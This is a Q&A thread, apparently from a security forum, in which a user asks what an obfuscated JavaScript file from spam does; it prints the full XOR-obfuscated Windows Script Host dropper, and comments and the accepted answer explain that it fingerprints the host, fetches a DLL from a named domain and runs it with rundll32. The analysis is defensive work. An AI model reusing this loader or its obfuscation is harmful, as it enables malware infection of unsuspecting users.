# How to de-obfuscate a malicious payload?

Tags: email, javascript, spam, pdf, internet-explorer

I've received some spam email that led to a JavaScript file which I assume is malicious.

My curiosity got the best of me so I opened the file in notepad and I'm trying to make sense of the code but I cannot decypher the PDF and hex parts.

I suppose the objective of the script is to generate a malicious PDF file using Microsoft's VB Script which is embedded in all Internet Explorers, being disabled by default on most recent versions but still available.

Here's the script:

```
'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';
var _0x8d0b=["\x7C","\x73\x70\x6C\x69\x74","","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6A\x6F\x69\x6E"];function decode(_0x39f5x2,_0x39f5x3){var _0x39f5x4=_0x39f5x3[_0x8d0b[1]](_0x8d0b[0]);var _0x39f5x5=_0x8d0b[2];function _0x39f5x6(_0x39f5x7,_0x39f5x8){var _0x39f5x9=_0x39f5x7^ _0x39f5x2[_0x8d0b[5]](Math[_0x8d0b[4]](_0x39f5x8% _0x39f5x2[_0x8d0b[3]]));_0x39f5x4[_0x39f5x8]= String[_0x8d0b[6]](_0x39f5x9)}for(var _0x39f5x8=0;_0x39f5x8< _0x39f5x4[_0x8d0b[3]];_0x39f5x8++){var _0x39f5x7=_0x39f5x4[_0x39f5x8];_0x39f5x6(_0x39f5x7,_0x39f5x8)};return _0x39f5x4[_0x8d0b[7]](_0x8d0b[2])}
var stream = WScript.CreateObject('ADODB.Stream');
var code = "15|15|20|23|50|39|91|87|60|77|31|3|36|38|118|127|84|16|30|0|58|33|94|107|124|13|109|25|103|94|43|108|70|79|108|90|40|27|29|37|20|35|50|109|38|53|7|54|16|112|55|85|112|67|35|61|110|104|66|100|46|55|58|84|115|19|54|104|83|89|80|64|42|65|10|45|55|33|33|91|26|106|40|62|67|98|93|106|96|21|45|37|2|54|9|115|16|55|7|32|29|63|65|92|44|26|34|7|31|18|45|51|44|44|84|5|27|127|35|33|11|19|5|44|23|55|2|120|123|61|23|41|109|99|124|22|34|68|110|22|85|35|17|2|47|28|29|36|2|25|121|101|58|111|74|97|93|58|72|14|78|67|68|79|48|64|87|122|26|63|1|121|72|89|27|31|52|47|24|18|23|83|107|120|116|88|78|122|108|114|113|44|37|28|5|106|5|26|31|3|16|14|120|64|117|111|80|65|91|85|98|58|23|65|94|40|29|77|124|31|16|0|12|36|27|118|21|68|102|83|81|124|69|17|53|46|8|61|24|17|105|22|17|23|21|2|118|95|61|109|49|70|104|18|3|2|82|56|8|109|7|24|67|0|12|43|51|13|89|10|29|90|79|61|92|111|96|72|123|97|47|10|80|18|44|40|56|86|99|63|61|34|13|1|21|17|71|2|35|40|53|1|39|46|4|70|79|77|113|123|26|127|102|98|115|102|72|52|4|63|65|9|113|95|69|10|47|66|13|90|39|31|71|48|75|95|80|76|108|33|9|6|0|99|65|96|121|10|22|110|73|126|82|64|85|78|106|91|95|107|81|18|66|20|50|41|30|71|28|58|71|87|109|4|85|19|43|88|111|75|18|5|52|28|84|36|56|66|53|34|98|5|109|6|86|43|85|63|46|13|87|94|78|102|126|42|93|66|101|68|71|86|122|83|93|24|17|2|17|3|17|102|5|38|70|25|115|67|79|119|27|39|6|31|10|86|24|19|24|32|52|22|31|83|51|51|94|44|10|101|5|66|82|4|29|21|0|1|54|47|67|42|75|36|28|57|58|48|4|55|18|57|63|78|26|27|120|71|78|81|95|82|120|76|97|84|81|90|68|12|86|9|66|84|17|63|46|32|21|64|28|122|47|121|48|33|39|63|1|10|53|42|56|18|28|4|20|21|88|118|44|33|37|5|11|66|63|87|95|121|38|22|85|24|62|6|56|13|67|40|65|31|26|58|47|1|35|1|2|126|121|69|13|92|99|93|69|76|111|101|104|14|106|51|91|58|107|71|69|70|106|95|111|93|74|75|82|66|6|19|61|37|31|41|114|36|25|63|63|111|18|7|32|35|102|57|88|92|63|80|100|47|125|65|122|124|80|99|55|24|4|109|89|102|23|56|6|87|35|0|38|55|110|17|26|110|70|94|74|100|21|92|38|2|14|90|53|44|55|26|53|71|74|98|72|106|12|97|115|77|113|86|114|77|120|51|10|70|89|36|15|28|69|28|126|85|116|120|51|76|35|3|35|29|14|81|93|77|54|106|67|14|29|27|87|59|85|64|90|124|105|92|106|121|72|121|82|83|79|112|69|20|102|99|114|116|107|31|3|38|58|20|69|3|11|97|23|13|122|72|78|113|35|25|35|16|39|15|39|37|62|54|0|7|127|17|88|37|39|49|2|15|45|35|69|103|0|120|97|49|24|41|7|53|34|57|38|124|117|69|108|9|87|121|57|67|24|21|16|19|99|97|83|69|111|102|89|59|43|13|37|65|37|33|116|49|37|10|49|1|111|27|39|37|86|31|119|121|111|112|112|18|96|90|68|81|80|86|18|126|40|82|124|72|40|17|8|45|69|58|53|15|77|15|2|44|23|124|1|122|95|80|66|101|24|49|58|108|50|18|77|85|53|16|87|107|84|46|57|53|2|74|92|15|22|5|59|121|29|55|13|65|20|5|109|10|115|75|115|76|74|44|88|67|4|48|98|14|46|86|111|114|93|95|48|31|34|3|121|28|12|11|76|41|33|100|85|84|84|23|15|87|101|83|58|79|46|35|42|114|69|32|69|16|31|15|126|65|68|57|107|98|11|12|12|14|33|86|85|44|32|36|24|81|10|73|33|24|71|123|124|98|122|127|49|127|7|80|74|77|90|27|25|97|126|72|102|18|24|13|29|55|92|60|28|60|6|17|94|35|21|13|3|41|46|90|18|38|53|55|63|122|6|32|108|49|72|0|3|37|2|17|49|95|68|82|94|106|29|97|73|59|121|64|75|112|106|26|93|54|25|65|22|111|68|18|24|66|37|51|114|116|124|62|127|77|124|90|77|83|71|105|52|57|61|88|111|68|82|26|26|33|46|8|63|34|31|101|50|126|63|64|97|106|125|98|83|47|59|47|50|54|32|25|26|16|95|63|111|124|60|124|100|55|24|16|16|18|51|15|39|117|95|116|28|43|60|27|76|89|91|49|111|25|121|17|77|29|27|89|6|10|116|2|23|56|91|99|47|84|120|65|22|3|53|45|38|13|8|108|23|38|15|15|18|65|19|52|16|53|46|59|18|58|55|3|14|114|87|72|110|122|94|98|56|78|114|17|88|33|33|59|5|53|11|122|35|69|72|101|96|122|101|17|18|95|99|71|84|67|48|34|60|16|108|60|93|101|90|110|101|112|98|42|57|5|9|36|47|9|87|65|105|41|43|30|83|91|57|97|61|76|69|95|71|22|121|104|76|88|88|100|60|84|58|35|98|80|23|42|21|89|83|21|28|59|26|65|49|22|124|19|123|74|58|123|113|123|92|80|102|76|87|100|113|83|22|70|81|24|17|58|86|103|6|32|88|26|39|91|39|62|36|26|66|75|118|56|64|108|125|112|99|17|122|108|80|97|106|107|68|86|38|31|31|106|4|9|63|66|112|111|98|1|32|35|67|47|102|2|81|61|14|126|113|87|67|79|122|56|71|121|65|104|16|83|72|110|67|82|52|0|51|97|3|38|98|114|119|10|27|1|53|55|12|33|47|27|32|115|5|121|86|108|74|107|67|48|104|111|120|89|18|59|96|57|121|49|81|74|77|111|65|20|90|30|66|24|28|54|0|118|9|62|86|20|35|124|68|100|92|125|114|89|20|121|63|44|58|53|65|49|39|41|72|111|67|9|57|28|86|43|41|43|66|15|119|76|57|110|90|113|107|71|102|108|22|24|19|88|12|32|100|108|78|6|20|3|98|9|15|73|76|71|77|96|82|66|62|59|112|117|79|117|101|81|23|18|53|88|27|122|119|86|17|23|63|25|54|58|80|121|76|104|109|103|102|103|24|80|25|74|69|68|19|88|70|51|63|43|22|100|25|53|53|100|111|26|70|2|32|7|38|88|126|68|7|72|101|110|61|70|60|104|120|79|122|66|115|84|85|70|31|20|85|43|75|58|120|1|0|83|53|75|39|18|25|11|43|35|7|70|114|69|77|52|22|20|16|74|55|4|34|21|74|100|60|71|68|48|82|72|75|90|81|104|74|117|56|43|2|3|44|90|25|44|43|97|71|19|106|19|95|37|39|38|25|57|39|19|122|71|27|43|41|119|53|64|125|106|104|70|115|19|111|115|74|116|82|65|35|70|71|4|95|75|1|42|60|63|25|122|17|8|102|100|67|106|122|38|44|24|29|35|33|43|14|27|45|11|12|93|94|90|103|94|74|59|74|80|78|17|53|93|126|89|102|97|123|73|89|122|23|104|97|18|60|42|6|33|62|48|62|22|56|72|102|109|67|77|21|66|82|49|38|54|46|45|46|33|39|86|98|7|38|59|16|67|49|72|107|107|121|94|83|67|22|77|116|109|68|85|0|33|94|87|44|119|61|3|21|93|109|27|30|17|19|63|28|100|123|73|121|93|108|105|79|125|115|117|74|80|109|77|98|85|19|42|38|7|21|48|70|29|43|23|64|86|25|122|32|63|85|2|29|34|21|98|95|100|85|66|53|21|3|1|34|8|39|84|106|59|107|127|62|112|18|72|116|111|90|90|65|116|7|39|9|33|30|72|6|49|39|121|114|42|103|40|50|84|22|99|64|10|62|123|49|72|48|83|25|25|81|122|66|75|87|35|38|53|49|28|116|25|47|21|112|26|44|98|25|90|50|33|60|20|61|14|11|40|61|35|76|28|1|33|48|107|111|116|108|91|120|77|73|21|98|110|31|71|101|98|49|112|72|117|87|105|90|74|104|98|16|39|66|47|52|37|91|46|78|62|58|112|64|83|116|65|86|48|25|0|1|29|43|27|90|64|84|49|31|55|28|72|67|123|69|103|79|113|80|99|68|120|104|119|86|37|34|13|39|111|122|28|13|3|5|116|14|101|22|42|59|87|85|113|23|112|80|102|123|78|127|74|72|115|24|19|103|22|101|118|28|10|32|17|98|18|34|11|40|8|112|30|68|37|81|46|4|66|54|53|111|124|68|117|57|67|74|87|54|53|30|58|21|112|125|100|65|110|112|74|90|122|76|81|18|112|75|16|35|33|19|17|78|59|114|107|114|83|41|116|102|58|14|48|46|56|2|11|5|64|81|46|42|8|84|127|108|68|102|80|115|57|108|106|103|117|103|119|108|83|48|9|6|83|98|64|97|0|54|98|109|107|111|57|6|27|44|6|37|89|94|85|10|75|114|99|85|75|113|99|97|108|118|79|103|24|81|67|67|61|12|57|42|1|99|50|34|49|87|119|45|24|23|45|78|2|23|43|13|58|45|12|27|17|26|9|50|84|72|82|107|94|92|68|103|99|92|83|90|77|77|76|74|73|83|126|77|75|19|112|69|108|104|108|79|52|89|93|65|6|85|109|57|70|113|73|86|114|66|62|13|34|11|13|58|12|57|123|93|3|117|82|79|92|93|102|108|83|89|87|107|113|105|37|92|42|16|111|116|15|53|97|101|54|27|42|10|37|26|23|98|98|65|64|61|81|112|58|114|101|106|25|44|66|109|109|90|100|83|67|110|50|65|68|93|66|80|102|18|69|107|65|127|62|68|92|76|94|101|20|42|115|1|112|12|113|7|38|1|47|4|16|62|22|102|77|25|92|58|60|70|120|75|108|118|65|57|81|10|105|97|110|45|11|75|22|20|75|14|103|59|61|57|80|31|60|45|8|24|126|45|100|22|96|43|47|62|114|13|28|100|33|37|22|22|57|9|120|83|92|126|90|74|84|120|49|17|1|42|98|67|32|46|56|7|110|52|25|119|88|54|22|59|11|116|21|107|87|61|18|26|56|107|115|57|60|27|33|18|122|103|110|40|97|27|30|85|26|87|96|50|68|64|76|111|70|108|90|86|6|7|40|56|25|104|55|35|8|112|118|54|27|53|5|38|27|82|75|46|12|31|104|79|120|13|16|15|0|7|42|43|38|56|21|119|14|25|119|46|23|14|63|52|89|84|87|101|96|62|78|113|77|81|14|15|14|71|35|74|47|114|51|120|99|51|93|56|1|10|29|93|94|111|78|75|60|77|49|115|99|119|67|109|45|46|114|68|38|40|39|42|19|62|119|43|89|107|24|111|29|58|44|22|54|43|118|121|101|81|69|2|125|81|76|95|109|99|118|90|19|114|82|109|67|65|20|87|38|30|38|1|70|45|44|46|41|45|75|94|125|68|126|65|91|106|113|80|77|28|6|95|60|48|27|30|120|31|70|73|8|33|66|20|78|38|27|26|64|1|16|24|121|1|121|119|10|79|0|41|33|26|25|37|50|55|35|42|42|48|71|8|59|79|102|91|87|73|116|119|70|46|16|31|37|45|78|36|6|62|36|49|123|2|54|23|119|110|14|10|63|96|88|76|5|68|60|71|101|74|123|45|7|22|113|117|19|30|56|5|17|2|48|42|63|109|28|89|27|43|25|58|100|79|59|104|115|0|87|49|116|68|70|48|61|50|4|119|5|19|87|31|49|105|41|62|59|36|39|56|60|71|101|29|28|26|96|102|111|99|79|52|3|53|18|50|14|88|76|80|56|111|84|77|114|28|8|0|19|3|56|92|49|74|89|99|19|50|121|97|24|43|75|94|24|14|53|33|33|63|22|27|85|43|75|70|60|59|95|25|105|16|114|18|83|4|79|1|22|64|104|83|89|38|46|56|32|48|0|35|2|126|0|88|0|11|121|55|49|3|17|66|36|126|82|86|67|0|97|100|100|69|91|66|118|121|91|101|72|23|68|80|84|25|46|24|87|31|48|40|66|120|101|87|22|67|12|73|41|42|7|65|13|9|54|45|18|56|77|96|31|111|122|124|63|121|16|82|22|82|69|36|5|90|52|51|32|37|14|99|102|104|99|84|83|110|101|0|59|59|80|17|85|54|98|93|111|73|92|81|81|67|106|23|78|3|71|61|23|38|93|45|84|106|106|16|13|27|32|127|81|111|89|65|81|21|104|116|66|93|32|23|67|85|110|2|16|53|18|38|24|48|6|51|96|54|91|57|70|89|5|54|34|66|85|56|76|111|70|99|85|81|73|18|18|57|5|110|76|97|82|51|28|24|111|32|65|47|35|68|4|122|121|30|15|53|60|124|102|104|126|65|120|73|101|54|92|37|27|0|59|121|114|15|2|17|44|22|14|78|37|3|56|120|59|82|10|40|72|53|44|31|71|13|88|42|11|50|111|17|86|46|17|55|64|2|110|121|120|94|62|21|52|82|109|126|23|11|62|121|114|15|86|45|65|36|32|31|49|45|35|90|64|63|84|97|122|122|77|74|71|71|66|78|44|94|93|104|103|92|69|1|21|41|14|13|22|60|109|31|101|56|11|33|22|40|110|86|98|125|24|104|18|72|103|118|112|82|35|4|36|123|38|121|21|110|47|53|48|47|97|84|100|55|20|5|3|0|27|37|109|20|48|51|84|114|38|99|19|21|58|10|18|21|58|111|110|33|25|113|2|38|20|17|45|17|45|56|43|22|48|23|96|109|29|124|110|109|33|31|62|51|17|22|35|30|25|15|31|63|86|50|24|35|37|54|12|42|123|6|37|82|89|100|75|86|8|14|53|5|10|126|45|103|6|103|14|13|9|111|51|16|99|125|9|14|16|28|63|121|30|126|95|89|66|4|52|82|28|21|35|48|105|69|17|13|47|61|14|54|11|42|16|8|39|12|38|39|11|11|15|46|27|6|26|34|32|29|58|19|27|82|13|31|35|58|20|6|38|52|93|95|28|38|27|102|35|4|14|0|32|23|84|29|56|22|15|114|1|63|20|36|42|33|62|17|6|4|39|23|57|49|105|10|88|54|31|4|1|84|5|32|19|35|97|93|48|91|18|24|5|60|97|100|37|108|110|26|77|58|104|89|58|91|123|5|62|118|5|48|26|34|65|20|14|24|47|38|100|60|2|102|3|56|105|19|48|74|87|12|101|112|37|120|22|23|47|53|106|35|18|123|35|43|21|109|17|91|36|51|9|68|9|124|17|121|0|30|58|93|112|43|14|6|0|45|35|34|64|30|19|11|46|6|106|105|42|105|102|44|32|91|21|15|126|7|33|59|45|98|109|124|84|109|64|25|115|72|109|94|66|112|74|100|111|31|34|122|1|37|8|7|50|60|8|19|29|44|28|62|53|110|30|15|19|59|29|42|99|19|83|94|118|95|109|11|12|14|74|61|109|31|75|59|66|67|70|115|106|17|72|19|109|121|115|7|55|11|122|29|47|0|30|90|123|78|104|75|126|78|62|77|112|18|102|73|87|97|79|63|71|124|96|101|76|73|77|9|120|2|50|43|58|13|107|56|29|3|31|41|111|21|51|109|37|37|1|74|55|102|74|16|52|30|25|18|44|28|108|113|17|0|11|29|49|123|27|99|113|113|10|12|65|47|108|112|36|6|23|47|30|63|75|61|100|58|40|41|77|7|40|65|35|120|5|104|60|10|127|58|94|74|127|112|78|110|94|95|103|113|84|118|65|19|27|58|38|24|39|44|120|101|26|56|39|97|64|58|108|112|51|53|11|89|114|51|83|115|107|9|29|44|51|24|54|35|21|50|38|27|60|17|64|42|26|84|58|24|38|75|40|98|53|58|32|48|25|117|61|103|31|38|39|32|60|110|109|34|107|100|26|55|64|10|90|31|22|35|61|70|24|67|27|105|124|46|103|43|93|80|88|63|76|60|93|121|65|25|18|119|61|31|56|2|28|108|96|6|36|124|20|57|111|63|20|67|12|10|35|69|99|59|68|120|77|36|5|60|115|52|8|9|120|24|25|24|43|2|108|110|42|22|29|29|56|97|122|19|96|37|46|59|16|31|105|26|7|49|17|3|56|70|106|104|90|100|27|31|75|40|92|56|69|37|40|77|25|85|44|67|101|25|87|14|70|108|95|109|92|102|96|111|83|65|110|61|15|29|40|52|1|56|122|101|48|40|7|21|67|40|43|84|31|114|63|86|123|13|121|116|108|115|40|1|1|9|2|110|16|22|7|122|5|56|118|62|50|69|29|31|39|102|58|123|0|40|43|16|53|3|110|80|58|60|14|42|56|85|63|10|100|29|122|33|17|101|65|29|57|62|32|3|29|64|42|19|30|53|7|41|31|122|62|94|97|111|58|109|20|113|86|48|14|54|49|17|61|25|107|109|51|15|11|56|118|110|26|81|52|15|28|112|27|20|85|10|105|32|0|122|56|54|15|9|90|50|24|15|11|34|101|5|34|112|18|61|53|114|109|64|45|20|8|6|23|34|54|68|36|55|19|32|43|71|4|19|112|35|120|57|86|110|25|43|25|15|91|14|76|85|31|116|89|15|10|20|69|97|85|127|106|76|107|71|115|116|72|69|103|101|89|82|89|103|19|63|127|37|121|3|58|18|5|62|126|24|55|97|27|51|17|58|36|26|102|91|109|69|78|88|36|124|25|36|40|13|2|16|25|44|112|46|11|99|11|106|111|54|22|4|74|15|55|82|110|79|123|78|121|37|35|32|21|23|50|38|27|23|111|96|94|65|84|60|15|0|45|67|51|82|37|81|16|79|108|113|40|122|11|118|34|16|100|0|13|12|41|6|67|50|40|26|53|119|106|106|22|110|82|78|120|107|87|85|71|113|118|66|81|18|107|115|24|9|46|38|120|8|69|63|25|125|34|96|96|37|8|73|37|54|1|91|27|28|118|11|102|62|31|23|1|43|127|30|16|30|18|127|59|100|71|16|12|115|6|9|62|121|69|43|116|0|33|14|10|31|16|112|3|28|100|51|40|11|17|41|62|12|106|6|32|63|40|98|20|40|49|109|15|20|37|6|99|45|31|36|14|62|16|121|91|21|21|8|33|19|109|86|46|43|71|110|93|99|69|121|98|90|126|113|12|42|60|112|25|6|31|122|3|38|17|32|18|86|44|33|70|4|55|58|5|17|57|114|118|110|65|116|11|5|48|22|31|18|100|24|22|44|29|28|91|59|111|107|58|35|122|122|23|22|122|55|81|92|127|76|119|83|74|110|59|77|115|67|118|112|57|26|23|106|115|26|5|45|5|57|49|117|5|56|127|29|58|118|17|55|109|19|9|33|82|27|15|29|13|8|9|2|2|39|35|44|3|24|6|17|92|49|5|31|47|6|30|11|83|3|24|125|124|2|67|44|31|70|53|16|103|107|79|15|120|108|81|72|121|113|78|49|76|69|106|102|81|109|72|61|94|96|30|10|14|22|48|22|37|35|107|68|90|57|69|120|117|88|67|77|108|49|21|106|125|79|96|65|23|76|89|100|88|86|114|77|120|117|69|20|54|30|33|44|36|57|24|71|26|12|19|60|17|83|25|51|65|98|114|107|112|19|46|125|112|5|87|52|70|81|116|40|37|81|36|32|73|51|20|21|4|17|41|111|100|22|6|29|7|56|73|18|18|109|49|20|24|1|23|13|115|88|126|91|79|97|77|69|106|74|105|113|109|77|16|122|113|82|16|3|25|61|47|42|4|57|19|26|61|24|3|22|85|39|40|101|31|26|17|118|25|83|101|15|122|52|124|5|122|116|124|104|76|62|39|44|3|21|114|111|2|74|3|113|6|109|9|109|22|43|13|9|25|97|70|48|56|13|14|53|41|34|91|58|24|30|2|11|123|41|28|18|46|49|20|89|108|57|59|96|91|60|51|15|77|73|76|103|84|124|83|76|88|83|70|102|103|112|104|108|112|75|25|16|79|57|30|48|92|13|20|14|33|37|125|53|64|51|7|24|126|63|115|111|19|116|100|60|18|69|28|24|30|70|123|106|88|108|98|117|83|77|66|113|93|95|126|37|12|51|24|34|50|90|108|17|28|8|59|86|46|107|22|14|34|10|17|27|19|127|5|114|116|13|120|114|55|126|21|88|49|4|30|14|58|87|37|48|112|46|120|27|122|97|49|16|10|100|66|58|76|114|81|72|83|86|24|127|124|60|92|78|87|3|17|13|15|39|119|39|38|63|81|5|38|19|34|0|73|15|109|96|49|15|62|123|105|47|75|74|77|77|83|58|72|116|100|115|76|121|108|118|121|88|76|126|110|106|97|74|73|57|37|69|23|34|106|28|74|19|69|79|102|58|113|50|59|125|98|74|114|74|67|116|124|62|4|85|36|34|53|52|110|12|43|34|45|59|25|95|57|101|121|72|39|72|120|56|95|37|58|95|21|107|0|23|38|61|0|118|123|110|37|47|60|4|12|8|89|40|76|14|76|15|79|109|89|64|82|88|103|84|32|51|4|109|11|119|102|81|20|96|100|92|81|1|56|82|95|88|71|84|76|96|51|99|99|91|82|119|80|88|101|67|97|97|72|65|83|30|57|61|96|91|29|97|20|55|7|35|97|88|49|42|18|53|57|125|113|7|77|72|110";
stream.Type = 2;
stream.Charset = 'us-ascii';
stream.Open();
stream.LoadFromFile(WScript.ScriptFullName);
stream.Position = 0;
var text = stream.ReadText(3669);
var decoded = decode(text, code);
eval(decoded);
```

What does it do?

Comment: It seems like the deobfuscated code would be in the `decoded` variable. Remove the last `eval` and dump that variable instead. I would still do it in a VM just in case somehow the decode function could execute the malicious code.

Comment: Which part of this looks like a PDF to you? I don't see it.

Comment: Not only should it be run in a VM but you should make sure that VM has no network access!

Comment: And please avoid putting others at risk with your desire to investigate malware.  This is not the type of thing that should be shared anywhere!

Comment: I got far enough to find that it sends a request to `dmnhulie.xyz/?...` where the `...` contains version information and a host fingerprint. That gets a response containing an ID which is sent in a second request to the same host, which gets back a response that's a DLL and then the script tries to `rundll32` it with `WScript.Shell`. It contains the string `Crypter.dll` which gives a clue to what it would do if successful. The obfuscation is just a bunch of xor'ing things at the right offsets. Nothing about the Javascript is interesting. It's just a downloader for the real nasty stuff, the DLL

Comment: The DLL I got is identical to the one described here: https://www.virustotal.com/en/file/b13e274e8c191671fe58127b3d9461df16e10acc3ff02e698119e1e8eabd924e/analysis/

Comment: Thank you, @WumpusQ.Wumbley for the information! I'll report the website I got this from to the Kaspersky Security Team and I would ask you to write it down as a answer so I can approve it. Sorry, I do not want to harm anyone. I thought that, since it's a JS, no one should be at harm unless they willingly execute this code in a vulnerable Internet Explorer.

Answer (score 7, accepted):

The first line `'iayQS28R...` is a key to be XORed with the bytes given in the `code` variable. When interpreted by Javascript, it does nothing because it's just a string constant. But the script opens its own source file (something you can't do in pure Javascript, but you can with the extra packages that are available when Windows runs a Javascript script as a standalone program). When it reads its own source (the first 3669 bytes - which happens to be the length of the first line) the apostrophes and semicolon are included, so the first value in `code` (15) is XORed with the character code of the `'` (39) to give 40, and the next value (also 15) is XORed with the character code of the `i` (105) to give 102, and so on. 40 and 102 are the character codes of `(` and `f`. The decoded text starts with `(function(GLOBAL, HOST, ID, V){`.

The decoded text is passed to `eval` at the end, so it's more Javascript, the next stage of the malware execution. Here is a copy with the boring inner functions removed and replaced by comments explaining what they do. The interesting stuff is in the `RUN` and `DEC` functions, and in the arguments provided in the last line.

```
(function(GLOBAL, HOST, ID, V){

        GLOBAL["UTILS"] = {
